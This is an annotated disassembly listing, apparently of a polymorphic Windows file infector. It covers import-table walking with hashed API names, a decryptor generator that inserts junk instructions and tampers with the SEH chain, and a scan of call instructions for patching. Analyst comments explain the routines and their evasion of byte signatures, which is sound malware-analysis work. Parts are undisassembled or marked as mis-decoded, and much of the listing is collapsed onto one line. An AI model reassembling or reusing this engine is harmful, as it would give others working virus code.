; FUNCTION CHUNK AT 3144248C SIZE 0000002E BYTES

                pop     dword ptr [ebp+1042C4h]         ; return address becomes the callback
                mov     dword ptr [ebp+1042C0h], 0      ; reset the counter
                call    sub_3144250B                    ; pass 1
                mov     eax, [ebp+1042C0h]
                call    near ptr dword_31441B40+43h     ; helper outside this chunk, result in edx
                call    sub_314424F7                    ; pass 2; the next instruction is its callback
                cmp     dword ptr [ebp+1042C0h], 0      ; countdown finished?
                jnz     short loc_314424F0
                mov     [ebp+102400h], ebx              ; keep the hash of the selected import
                jmp     short loc_3144248C              ; leave the walk through the shared exit
; ---------------------------------------------------------------------------

loc_314424F0:                           ; CODE XREF: sub_314424BA+2Cj
                dec     dword ptr [ebp+1042C0h]         ; not yet: count down and keep walking
                retn
sub_314424BA    endp ; sp-analysis failed


; =============== S U B R O U T I N E =======================================
;
; sub_314424F7 - start a walk with a preset countdown.
; Pops its return address into the callback slot [ebp+1042C4h], stores edx in
; [ebp+1042C0h] and runs sub_3144250B. When the walk finishes on its own the
; routine returns ecx = 0; the retn then uses whatever return address lies
; below the one that was popped.

sub_314424F7    proc near               ; CODE XREF: sub_314424BA+20p
                pop     dword ptr [ebp+1042C4h]
                mov     [ebp+1042C0h], edx
                call    sub_3144250B
                xor     ecx, ecx
                retn
sub_314424F7    endp ; sp-analysis failed


; =============== S U B R O U T I N E =======================================
;
; sub_3144250B - iterate a PE import directory and call [ebp+1042C4h] for each
; by-name import of selected modules.
;
; In:   ebx  header base; the RVA at [ebx+80h] is used as the start of the
;            14h-byte descriptor array (the import directory slot of a PE32
;            header when ebx points at the 'PE' signature)
;       esi  base of the image bytes being parsed; it is added to every offset
;            obtained through sub_31442404
;       ebp  base for the code's own variables
; Module filter: the name referenced at descriptor+0Ch must have at least six
;       characters before ".DLL" (matched case-insensitively) or before the
;       terminating NUL, and the two characters just before that point must be
;       "32".
; Name filter: each imported name is folded into a 32-bit hash
;       (h = h*15 - (char OR 20h)); eight hash values are skipped, every other
;       name triggers the callback with ebx = hash. The names behind those
;       eight constants are not recoverable from this chunk.
; Imports whose thunk has the top bit set (by ordinal) are ignored.

sub_3144250B    proc near               ; CODE XREF: sub_314424BA+10p
                                        ; sub_314424F7+Cp ...

var_C           = dword ptr -0Ch
var_4           = dword ptr -4

                mov     edx, [ebx+80h]
                push    edx
                call    sub_31442404                    ; section delta for the directory RVA
                add     edx, [ebp+1042E8h]
                add     edx, esi                        ; edx = first descriptor

loc_3144251F:                           ; CODE XREF: sub_3144250B+120j
                cmp     dword ptr [edx+0Ch], 0          ; an empty name field ends the array
                jz      locret_31442630
                cmp     dword ptr [edx+10h], 0          ; so does an empty +10h field
                jz      locret_31442630
                mov     eax, [edx+0Ch]
                push    eax
                call    sub_31442404
                add     eax, [ebp+1042E8h]
                add     eax, esi                        ; eax = module name string
                push    eax                             ; keep its start for the length test

loc_31442545:                           ; CODE XREF: sub_3144250B+47j
                mov     cl, [eax]
                cmp     cl, 0
                jz      short loc_31442565              ; end of string
                cmp     cl, 2Eh                         ; '.'
                jz      short loc_31442554

loc_31442551:                           ; CODE XREF: sub_3144250B+58j
                inc     eax
                jmp     short loc_31442545
; ---------------------------------------------------------------------------

loc_31442554:                           ; CODE XREF: sub_3144250B+44j
                mov     ecx, [eax+1]
                and     ecx, 0DFDFDFDFh                 ; force upper case
                cmp     ecx, 4C4C44h                    ; "DLL" followed by NUL
                jnz     short loc_31442551

loc_31442565:                           ; CODE XREF: sub_3144250B+3Fj
                pop     ecx
                sub     ecx, eax                        ; minus the length of the base name
                cmp     ecx, 0FFFFFFFAh
                jg      loc_31442628                    ; shorter than six characters: skip module
                cmp     word ptr [eax-2], 3233h         ; base name must end in "32"
                jnz     loc_31442628
                push    esi                             ; saved base, restored at loc_31442627
                cmp     dword ptr [edx], 0
                jnz     short loc_31442588
                mov     ecx, [edx+10h]                  ; no array at +0: use the one at +10h
                jmp     short loc_3144258A
; ---------------------------------------------------------------------------

loc_31442588:                           ; CODE XREF: sub_3144250B+76j
                mov     ecx, [edx]

loc_3144258A:                           ; CODE XREF: sub_3144250B+7Bj
                add     esi, ecx
                push    ecx
                call    sub_31442404
                add     esi, [ebp+1042E8h]              ; esi = thunk array inside the mapped bytes

loc_31442598:                           ; CODE XREF: sub_3144250B+90j
                                        ; sub_3144250B+117j
                lodsd
                test    eax, eax
                js      short loc_31442598              ; top bit set: import by ordinal, skip
                jz      loc_31442627                    ; zero entry ends the array
                push    dword ptr [ebp+1042E8h]         ; keep the thunk-array delta
                push    eax
                call    sub_31442404
                add     eax, [ebp+1042E8h]
                pop     dword ptr [ebp+1042E8h]         ; put the thunk-array delta back
                add     eax, [esp+4+var_4]              ; + saved base on top of the stack
                push    ebx
                add     eax, 2                          ; skip the two bytes in front of the name
                xor     ebx, ebx                        ; hash accumulator

loc_314425C4:                           ; CODE XREF: sub_3144250B+CEj
                movzx   ecx, byte ptr [eax]
                jecxz   short loc_314425DB              ; NUL: hash complete
                or      cl, 20h                         ; fold case
                push    ebx
                shl     [esp+0Ch+var_C], 4              ; the three stack operations compute
                sub     [esp+0Ch+var_C], ebx            ; h*16 - h - char
                sub     [esp+0Ch+var_C], ecx
                pop     ebx
                inc     eax
                jmp     short loc_314425C4
; ---------------------------------------------------------------------------

loc_314425DB:                           ; CODE XREF: sub_3144250B+BCj
                cmp     ebx, 0DDBBD70Fh                 ; eight hashes that never reach the callback
                jz      short loc_31442621
                cmp     ebx, 0DB6E45A8h
                jz      short loc_31442621
                cmp     ebx, 0FFA13B59h
                jz      short loc_31442621
                cmp     ebx, 0ACB522D6h
                jz      short loc_31442621
                cmp     ebx, 0F358E993h
                jz      short loc_31442621
                cmp     ebx, 0F358E97Dh
                jz      short loc_31442621
                cmp     ebx, 0E1253F46h
                jz      short loc_31442621
                cmp     ebx, 0E1253F30h
                jz      short loc_31442621
                call    dword ptr [ebp+1042C4h]         ; callback installed by sub_314424BA / sub_314424F7

loc_31442621:                           ; CODE XREF: sub_3144250B+D6j
                                        ; sub_3144250B+DEj ...
                pop     ebx
                jmp     loc_31442598
; ---------------------------------------------------------------------------

loc_31442627:                           ; CODE XREF: sub_3144250B+92j
                pop     esi

loc_31442628:                           ; CODE XREF: sub_3144250B+60j
                                        ; sub_3144250B+6Cj
                add     edx, 14h                        ; next descriptor
                jmp     loc_3144251F
; ---------------------------------------------------------------------------

locret_31442630:                        ; CODE XREF: sub_3144250B+18j
                                        ; sub_3144250B+22j
                retn
sub_3144250B    endp

; ---------------------------------------------------------------------------
; Bytes that IDA did not disassemble. They contain 0E8h call opcodes and are
; probably code. By address arithmetic the target dword_31442634+68h used by
; calls further down falls inside this run; TODO confirm by defining code here.
                db 3, 6Ah, 4
                dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h
                dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
                dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h
                dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
                dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
                dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h
                dd 0
; ---------------------------------------------------------------------------
; NOTE(review): the decode below probably starts in the middle of an
; instruction whose first bytes are the tail of the dd run above, so the lines
; up to loc_314426C6 should not be trusted as shown. Re-disassemble from the
; true instruction boundary before drawing conclusions.
                adc     [edi], cl
                xchg    eax, ebp
                rol     cl, 0E0h
                or      esi, esi
                test    [esi+1001039h], ebp
                jnz     short loc_314426C6
                or      ax, 2589h
                jmp     short loc_314426D9
; ---------------------------------------------------------------------------

loc_314426C6:                           ; CODE XREF: UPX2:314426BEj
                test    byte ptr [ebp+1039AEh], 2
                jnz     short loc_314426D5
                or      ax, 2531h
                jmp     short loc_314426D9
; ---------------------------------------------------------------------------

loc_314426D5:                           ; CODE XREF: UPX2:314426CDj
                or      ax, 2501h

loc_314426D9:                           ; CODE XREF: UPX2:314426C4j
                                        ; UPX2:314426D3j
                stosw                                   ; write the two bytes selected above at edi
                call    near ptr dword_31442634+68h     ; helper inside the undisassembled run
                mov     eax, [ebx+34h]                  ; dword at header+34h (ImageBase in a PE32 header)
                mov     [ebp+1042D8h], edx
                stosd                                   ; ... followed by that dword
                retn

; =============== S U B R O U T I N E =======================================
;
; sub_314426EB - append five bytes at edi: one opcode byte, then a dword.
; The opcode is 0BCh, or 0BDh when bit 10000000h of [ebp+1039B0h] is set (the
; x86 encodings of "mov esp, imm32" and "mov ebp, imm32"). The dword is zero
; when bit 0 of [ebp+1039AEh] is set, otherwise the low half of RDTSC.
; edx as returned by the helper is saved in [ebp+1042DCh].
; In/Out: edi = output cursor, advanced by 5. Clobbers eax, edx, flags.

sub_314426EB    proc near               ; CODE XREF: UPX2:31442D37p
                test    dword ptr [ebp+1039B0h], 10000000h
                setnz   al
                add     al, 0BCh                        ; 0BCh or 0BDh
                stosb
                call    near ptr dword_31442634+68h
                mov     [ebp+1042DCh], edx
                test    byte ptr [ebp+1039AEh], 1
                jnz     short loc_31442713
                rdtsc                                   ; time-stamp counter supplies the immediate
                jmp     short loc_31442715
; ---------------------------------------------------------------------------

loc_31442713:                           ; CODE XREF: sub_314426EB+22j
                sub     eax, eax

loc_31442715:                           ; CODE XREF: sub_314426EB+26j
                stosd
                retn
sub_314426EB    endp


; =============== S U B R O U T I N E =======================================
;
; sub_31442717 - append one of two fixed byte sequences at edi, parameterised
; by the register number held in byte [ebp+1039AAh] (called r below).
;   bit 10000000h of [ebp+1039B0h] set:
;       8Bh, 45h+8*r, 0F8h           decodes as mov r32, [ebp-8]
;       67h, 64h, 89h, 06h+8*r, 0, 0 decodes as mov fs:[0], r32
;   bit clear:
;       64h, 8Fh, 05h, 0, 0, 0, 0    decodes as pop dword ptr fs:[0]
;       58h+r                        decodes as pop r32
; Both forms write to fs:[0], the head of the thread's SEH chain on 32-bit
; Windows. In/Out: edi = output cursor. Clobbers eax, flags.

sub_31442717    proc near               ; CODE XREF: UPX2:loc_31442D41p
                test    dword ptr [ebp+1039B0h], 10000000h
                jz      short loc_3144274A
                mov     al, [ebp+1039AAh]
                shl     eax, 0Bh                        ; r goes into bits 3..5 of the second byte
                or      ax, 458Bh
                stosw
                mov     al, 0F8h                        ; disp8 = -8
                stosb
                mov     al, [ebp+1039AAh]
                shl     eax, 1Bh                        ; r goes into bits 3..5 of the top byte
                add     eax, 6896467h
                stosd
                xor     eax, eax
                stosw                                   ; 16-bit displacement 0
                jmp     short locret_3144275C
; ---------------------------------------------------------------------------

loc_3144274A:                           ; CODE XREF: sub_31442717+Aj
                mov     eax, 58F64h
                stosd
                mov     al, [ebp+1039AAh]
                add     al, 58h
                shl     eax, 18h                        ; three zero bytes, then 58h+r
                stosd

locret_3144275C:                        ; CODE XREF: sub_31442717+31j
                retn
sub_31442717    endp


; =============== S U B R O U T I N E =======================================
;
; sub_3144275D - append a variable-length run of filler instructions at edi.
;
; Every round calls the helper at dword_31441B40+43h with the value pushed at
; loc_3144278B in eax and stops as soon as the returned dl is 8 or more; dl in
; 0..7 selects one filler encoding:
;   0: 0FCh (cld)           1: 0EBh,00h (jmp short to next instruction)
;   2: 89h,0C0h+9*n (mov of a register onto itself, n from the helper with eax = 4)
;   3: 90h (nop)            4: 87h,0DBh (xchg ebx, ebx)
;   5: 0F5h (cmc)           6: 0F8h (clc)           7: 0F9h (stc)
; NOTE(review): the writes to [ebp+10278Ch] appear to patch the immediate of
; the "push 1Bh" at loc_3144278B (reset to 9 on entry, +6 per round), which
; would make the run end sooner with each round. This relies on the ebp base
; derived elsewhere in the listing; confirm against the raw bytes.
; Because these bytes vary between generated copies, a byte signature taken
; over the emitted code is unlikely to be stable.
; In/Out: edi = output cursor. Clobbers eax, edx, flags.

sub_3144275D    proc near               ; CODE XREF: sub_314427CF:loc_314427F6p
                                        ; sub_314427CF+4Cp ...
                mov     byte ptr [ebp+10278Ch], 9
                jmp     short loc_3144278B
; ---------------------------------------------------------------------------

loc_31442766:                           ; CODE XREF: sub_3144275D+44j
                mov     al, 0FCh
                jmp     short loc_3144278A
; ---------------------------------------------------------------------------

loc_3144276A:                           ; CODE XREF: sub_3144275D+48j
                mov     ax, 0EBh
                stosw
                jmp     short loc_3144278B
; ---------------------------------------------------------------------------

loc_31442772:                           ; CODE XREF: sub_3144275D+4Cj
                push    4
                pop     eax
                call    near ptr dword_31441B40+43h
                lea     eax, [edx+edx*8]                ; 9*n sets both register fields of the ModRM byte
                shl     eax, 8
                add     ax, 0C089h
                stosw
                jmp     short loc_3144278B
; ---------------------------------------------------------------------------

loc_31442788:                           ; CODE XREF: sub_3144275D+50j
                mov     al, 90h

loc_3144278A:                           ; CODE XREF: sub_3144275D+Bj
                                        ; sub_3144275D+60j ...
                stosb

loc_3144278B:                           ; CODE XREF: sub_3144275D+7j
                                        ; sub_3144275D+13j ...
                push    1Bh
                pop     eax
                call    near ptr dword_31441B40+43h
                add     byte ptr [ebp+10278Ch], 6
                cmp     dl, 8
                jnb     short locret_314427CE           ; 8 or more: stop emitting filler
                test    dl, dl
                jz      short loc_31442766
                dec     dl
                jz      short loc_3144276A
                dec     dl
                jz      short loc_31442772
                dec     dl
                jz      short loc_31442788
                dec     dl
                jz      short loc_314427BF
                dec     dl
                jz      short loc_314427C6
                dec     dl
                jz      short loc_314427CA
                mov     al, 0F9h
                jmp     short loc_3144278A
; ---------------------------------------------------------------------------

loc_314427BF:                           ; CODE XREF: sub_3144275D+54j
                mov     al, 87h
                stosb
                mov     al, 0DBh
                jmp     short loc_3144278A
; ---------------------------------------------------------------------------

loc_314427C6:                           ; CODE XREF: sub_3144275D+58j
                mov     al, 0F5h
                jmp     short loc_3144278A
; ---------------------------------------------------------------------------

loc_314427CA:                           ; CODE XREF: sub_3144275D+5Cj
                mov     al, 0F8h
                jmp     short loc_3144278A
; ---------------------------------------------------------------------------

locret_314427CE:                        ; CODE XREF: sub_3144275D+40j
                retn
sub_3144275D    endp


; =============== S U B R O U T I N E =======================================
;
; sub_314427CF - append a three-instruction byte read / modify / write sequence
; at edi, with filler from sub_3144275D between the parts.
;   1. opcode 8Ah, or 86h when bit 2000h of [ebp+1039B0h] is set, with byte
;      [ebp+1039A8h] as ModRM (mov or xchg al, [reg])
;   2. 66h, then 29h or 31h (bit 4000h set), then ModRM 0C0h + 8*[ebp+1039AAh]
;      (16-bit sub or xor of ax with a register)
;   3. opcode 86h, or 88h when bit 8000h is set, with the same ModRM as step 1
;      (xchg or mov [reg], al)
; When the register number is 5 the ModRM byte is changed to the disp8 form and
; a zero displacement is appended, since ModRM value 5 alone means an absolute
; 32-bit address.
; NOTE(review): this looks like the per-byte transform of a generated decoding
; loop; that role is inferred from the emitted opcodes only.
; In/Out: edi = output cursor. ecx receives edi-2 on entry. Clobbers eax, edx, flags.

sub_314427CF    proc near               ; CODE XREF: UPX2:loc_31442C18p
                                        ; UPX2:31442DCBp
                test    dword ptr [ebp+1039B0h], 2000h
                mov     al, 86h
                jnz     short loc_314427DF
                add     al, 4                           ; 8Ah

loc_314427DF:                           ; CODE XREF: sub_314427CF+Cj
                lea     ecx, [edi-2]
                mov     ah, [ebp+1039A8h]
                stosw
                cmp     ah, 5
                jnz     short loc_314427F6
                mov     al, 0
                or      byte ptr [edi-1], 40h           ; switch the ModRM just written to the disp8 form
                stosb                                   ; disp8 = 0

loc_314427F6:                           ; CODE XREF: sub_314427CF+1Ej
                call    sub_3144275D
                test    dword ptr [ebp+1039B0h], 4000h
                mov     ax, 3166h
                jnz     short loc_3144280D
                mov     ah, 29h

loc_3144280D:                           ; CODE XREF: sub_314427CF+3Aj
                stosw
                mov     al, 18h
                or      al, [ebp+1039AAh]
                shl     al, 3                           ; 0C0h + 8*register number
                stosb
                call    sub_3144275D
                mov     al, 88h
                test    dword ptr [ebp+1039B0h], 8000h
                jnz     short loc_31442830
                mov     al, 86h

loc_31442830:                           ; CODE XREF: sub_314427CF+5Dj
                mov     ah, [ebp+1039A8h]
                stosw
                cmp     ah, 5
                jnz     short locret_31442844
                mov     al, 0
                or      byte ptr [edi-1], 40h           ; same disp8 adjustment as in step 1
                stosb

locret_31442844:                        ; CODE XREF: sub_314427CF+6Cj
                retn
sub_314427CF    endp

;
--------------------------------------------------------------------------- loc_31442845: ; CODE XREF: sub_3144344B+183p lea edi, [ebp+1039BCh] call sub_3144275D test dword ptr [ebp+1039B0h], 400000h jz short near ptr unk_3144285F mov al, 60h stosb ; --------------------------------------------------------------------------- unk_3144285F db 0F7h ; ; CODE XREF: UPX2:3144285Aj db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- adc [edi+eax-48h], dh push ebp mov ebp, esp add [ebx-4F7A08B1h], ch cmp [eax], edx add [ebx], al ; --------------------------------------------------------------------------- db 2 dup(0), 2 dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h dd 1039B085h, 300h, 0F6137400h, 1039AE85h, 0A748000h, 0FFFDAAE8h dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh, 0FD4BE8ABh dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh dd 1039AAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 
10001039h dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0 dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039A8h dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h, 42B8BD89h dd 0F7AB0010h, 1039B085h, 0 ; --------------------------------------------------------------------------- inc eax jnz short loc_31442AF0 mov al, 50h add al, [ebp+1039A8h] stosb loc_31442AF0: ; CODE XREF: UPX2:31442AE5j test dword ptr [ebp+1039B0h], 80h jnz short loc_31442B07 mov al, 0B8h or al, [ebp+1039A9h] stosb jmp short loc_31442B44 ; --------------------------------------------------------------------------- loc_31442B07: ; CODE XREF: UPX2:31442AFAj mov ax, 1831h test dword ptr [ebp+1039B0h], 100h jz short loc_31442B19 mov al, 29h loc_31442B19: ; CODE XREF: UPX2:31442B15j or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw mov ax, 0F081h test dword ptr [ebp+1039B0h], 200h jnz short loc_31442B3C mov ah, 0C8h loc_31442B3C: ; CODE XREF: UPX2:31442B38j or ah, [ebp+1039A9h] stosw loc_31442B44: ; CODE XREF: UPX2:31442B05j mov [ebp+1042D4h], edi mov eax, 29BCh stosd test dword ptr [ebp+1039B0h], 8 jz short loc_31442BCD call sub_3144275D test dword ptr [ebp+1039B0h], 400h jnz short loc_31442B78 mov al, 0B8h or al, [ebp+1039AAh] stosb jmp short loc_31442BC5 ; --------------------------------------------------------------------------- loc_31442B78: ; CODE XREF: UPX2:31442B6Bj test dword ptr [ebp+1039B0h], 800h jnz short loc_31442B95 mov ax, 0E083h or ah, [ebp+1039AAh] stosw xor eax, eax stosb jmp short loc_31442BAA ; --------------------------------------------------------------------------- loc_31442B95: ; CODE XREF: UPX2:31442B82j mov ax, 1829h or ah, [ebp+1039AAh] shl ah, 3 or ah, [ebp+1039AAh] stosw loc_31442BAA: ; CODE XREF: UPX2:31442B93j test dword 
ptr [ebp+1039B0h], 1000h mov ax, 0C081h jz short loc_31442BBD add ah, 8 loc_31442BBD: ; CODE XREF: UPX2:31442BB8j or ah, [ebp+1039AAh] stosw loc_31442BC5: ; CODE XREF: UPX2:31442B76j movzx eax, byte ptr [ebp+1039AEh] stosd loc_31442BCD: ; CODE XREF: UPX2:31442B5Aj call sub_3144275D test dword ptr [ebp+1039B0h], 40000000h jz short loc_31442BEC mov al, 50h add al, [ebp+1039A8h] stosb call sub_3144275D loc_31442BEC: ; CODE XREF: UPX2:31442BDCj lea ecx, [edi-2] mov [ebp+1042BCh], ecx test dword ptr [ebp+1039B0h], 80000000h jz short loc_31442C18 mov al, 0E8h stosb mov eax, [ebp+1042E0h] sub eax, edi sub eax, 4 stosd mov [ebp+1042E0h], edi jmp short loc_31442C1D ; --------------------------------------------------------------------------- loc_31442C18: ; CODE XREF: UPX2:31442BFFj call sub_314427CF loc_31442C1D: ; CODE XREF: UPX2:31442C16j call sub_3144275D test dword ptr [ebp+1039B0h], 10000h jnz short loc_31442C39 mov al, 40h or al, [ebp+1039A8h] stosb jmp short loc_31442C48 ; --------------------------------------------------------------------------- loc_31442C39: ; CODE XREF: UPX2:31442C2Cj mov ax, 0C083h or ah, [ebp+1039A8h] stosw mov al, 1 stosb loc_31442C48: ; CODE XREF: UPX2:31442C37j test dword ptr [ebp+1039B0h], 20000h jnz short loc_31442C83 test dword ptr [ebp+1039B0h], 40000h jnz short loc_31442C7A mov al, 0C0h or al, [ebp+1039AAh] mov ah, [ebp+1039AFh] shl eax, 10h mov ax, 8166h stosd mov al, 0 jmp short loc_31442C82 ; --------------------------------------------------------------------------- loc_31442C7A: ; CODE XREF: UPX2:31442C5Ej mov al, 40h or al, [ebp+1039AAh] loc_31442C82: ; CODE XREF: UPX2:31442C78j stosb loc_31442C83: ; CODE XREF: UPX2:31442C52j test dword ptr [ebp+1039B0h], 80000h jnz short loc_31442C9F mov ax, 0E883h or ah, [ebp+1039A9h] stosw mov al, 1 jmp short loc_31442CA7 ; --------------------------------------------------------------------------- loc_31442C9F: ; CODE XREF: UPX2:31442C8Dj mov al, 48h or al, [ebp+1039A9h] loc_31442CA7: ; CODE 
XREF: UPX2:31442C9Dj stosb call sub_3144275D test dword ptr [ebp+1039B0h], 100000h mov cl, 75h jnz short loc_31442CE0 mov ax, 0F883h or ah, [ebp+1039A9h] stosw xor eax, eax stosb sub [ebp+1042BCh], edi test dword ptr [ebp+1039B0h], 200000h jnz short loc_31442CFB mov cl, 77h jmp short loc_31442CFB ; --------------------------------------------------------------------------- loc_31442CE0: ; CODE XREF: UPX2:31442CB9j mov ax, 1809h or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw sub [ebp+1042BCh], edi loc_31442CFB: ; CODE XREF: UPX2:31442CDAj ; UPX2:31442CDEj mov al, cl mov ah, [ebp+1042BCh] stosw mov al, 58h add al, [ebp+1039A8h] stosb call sub_3144275D test dword ptr [ebp+1039B0h], 2000003h jz short loc_31442D4B test dword ptr [ebp+1039B0h], 8000000h jnz short loc_31442D4B test dword ptr [ebp+1039B0h], 6000000h jnz short loc_31442D41 call sub_314426EB call sub_3144275D loc_31442D41: ; CODE XREF: UPX2:31442D35j call sub_31442717 call sub_3144275D loc_31442D4B: ; CODE XREF: UPX2:31442D1Dj ; UPX2:31442D29j test dword ptr [ebp+1039B0h], 10000000h jz short loc_31442D5F mov al, 0C9h stosb call sub_3144275D loc_31442D5F: ; CODE XREF: UPX2:31442D55j test dword ptr [ebp+1039B0h], 400000h jz short loc_31442D95 mov al, 7 sub al, [ebp+1039A8h] shl eax, 1Ah or eax, 240889h add ah, [ebp+1039A8h] shl ah, 3 add ah, 4 stosd call sub_3144275D mov al, 61h stosb call sub_3144275D loc_31442D95: ; CODE XREF: UPX2:31442D69j mov ax, 0E0FFh or ah, [ebp+1039A8h] stosw call sub_3144275D test dword ptr [ebp+1039B0h], 20h jz short loc_31442E21 test dword ptr [ebp+1039B0h], 80000000h jz short loc_31442DDD mov eax, edi mov ecx, [ebp+1042E0h] sub eax, ecx mov [ecx-4], eax call sub_314427CF call sub_3144275D mov al, 0C3h stosb call sub_3144275D loc_31442DDD: ; CODE XREF: UPX2:31442DBCj mov eax, edi mov ecx, [ebp+1042B4h] sub eax, ecx mov [ecx-4], eax mov al, 58h or al, [ebp+1039A8h] stosb call sub_3144275D test dword ptr [ebp+1039B0h], 800000h jz short loc_31442E10 mov ax, 0C350h or al, 
[ebp+1039A8h] jmp short loc_31442E1A ; --------------------------------------------------------------------------- loc_31442E10: ; CODE XREF: UPX2:31442E02j mov ax, 0E0FFh or ah, [ebp+1039A8h] loc_31442E1A: ; CODE XREF: UPX2:31442E0Ej stosw call sub_3144275D loc_31442E21: ; CODE XREF: UPX2:31442DB0j test dword ptr [ebp+1039B0h], 2000003h jz short loc_31442E8C mov ecx, edi mov eax, [ebp+1042CCh] sub ecx, eax mov [eax-4], ecx xor ecx, ecx test dword ptr [ebp+1039B0h], 1000000h jnz short loc_31442E56 lea eax, [ebp+1039A8h] loc_31442E4E: ; CODE XREF: UPX2:31442E54j mov cl, [eax] inc eax cmp cl, 3 jnb short loc_31442E4E loc_31442E56: ; CODE XREF: UPX2:31442E46j lea eax, ds:102444h[ecx*8] shl eax, 8 mov al, 8Bh stosd jecxz short loc_31442E6B mov ax, 0C031h stosw loc_31442E6B: ; CODE XREF: UPX2:31442E63j mov ax, 808Fh push 0B8h add ah, cl stosw pop eax stosd test ecx, ecx jnz short loc_31442E84 mov ax, 0C031h stosw loc_31442E84: ; CODE XREF: UPX2:31442E7Cj mov al, 0C3h stosb call sub_3144275D loc_31442E8C: ; CODE XREF: UPX2:31442E2Bj lea eax, [ebp+1039BCh] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_31442EA4 push edi sub edi, eax pop eax jmp short loc_31442EBD ; --------------------------------------------------------------------------- loc_31442EA4: ; CODE XREF: UPX2:31442E9Cj mov edx, [ebx+28h] sub edi, eax sub edx, eax mov ecx, [ebp+1042D4h] add [ebp+1042B4h], edx add [ecx], edi mov eax, [esp+4] loc_31442EBD: ; CODE XREF: UPX2:31442EA2j mov [ebp+101069h], edi mov edi, [ebp+1042B8h] sub eax, [ebp+1042B4h] test dword ptr [ebp+1039B0h], 40h jz short loc_31442EDD neg eax loc_31442EDD: ; CODE XREF: UPX2:31442ED9j stosd retn 4 ; =============== S U B R O U T I N E ======================================= sub_31442EE1 proc near ; CODE XREF: sub_3144344B+336p push esi push edi cmp dword ptr [ebp+1042F0h], 0 jz loc_314430C9 call near ptr loc_31442F01+1 dec ebx inc ebp push edx dec esi inc ebp dec esp xor esi, [edx] db 2Eh inc esp dec esp dec esp loc_31442F01: ; CODE 
XREF: sub_31442EE1+Fp add bh, bh sub_31442EE1 endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al mov [ebp+104304h], eax push ebx mov ebx, [eax+3Ch] add ebx, eax push dword ptr [ebx+28h] mov eax, [ebx+34h] call sub_31442404 mov edx, [ebp+1042E4h] pop ebx add eax, [edx+0Ch] mov [ebp+104308h], eax add eax, [edx+8] mov [ebp+10430Ch], eax mov esi, [ebx+28h] push dword ptr [ebx+80h] call sub_31442404 mov edi, [ebp+1042E4h] push esi call sub_31442404 mov edx, [ebp+1042E4h] mov ecx, [edx+8] add ecx, [edx+0Ch] sub ecx, esi sub ecx, 5 js loc_314430C9 jz loc_314430C9 add esi, [ebp+1042E8h] add esi, [ebp+1042A4h] ; START OF FUNCTION CHUNK FOR sub_3144309A loc_31442F7B: ; CODE XREF: sub_3144309A+29j lodsb cmp al, 0E8h jnz loc_31443026 lea eax, [esi+4] sub eax, [ebp+1042A4h] add eax, [esi] push eax call sub_31442404 cmp dword ptr [ebp+1042E4h], 0 jnz short loc_31442FA9 cmp eax, [edi+0Ch] jnb loc_314430C2 jmp short loc_31442FB5 ; --------------------------------------------------------------------------- loc_31442FA9: ; CODE XREF: sub_3144309A-FEj cmp [ebp+1042E4h], edx jnz loc_314430C2 loc_31442FB5: ; CODE XREF: sub_3144309A-F3j add eax, [ebp+1042A4h] cmp word ptr [eax], 25FFh jnz loc_314430C2 mov eax, [eax+2] sub eax, [ebx+34h] push eax call sub_31442404 cmp [ebp+1042E4h], edi jnz loc_314430C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov 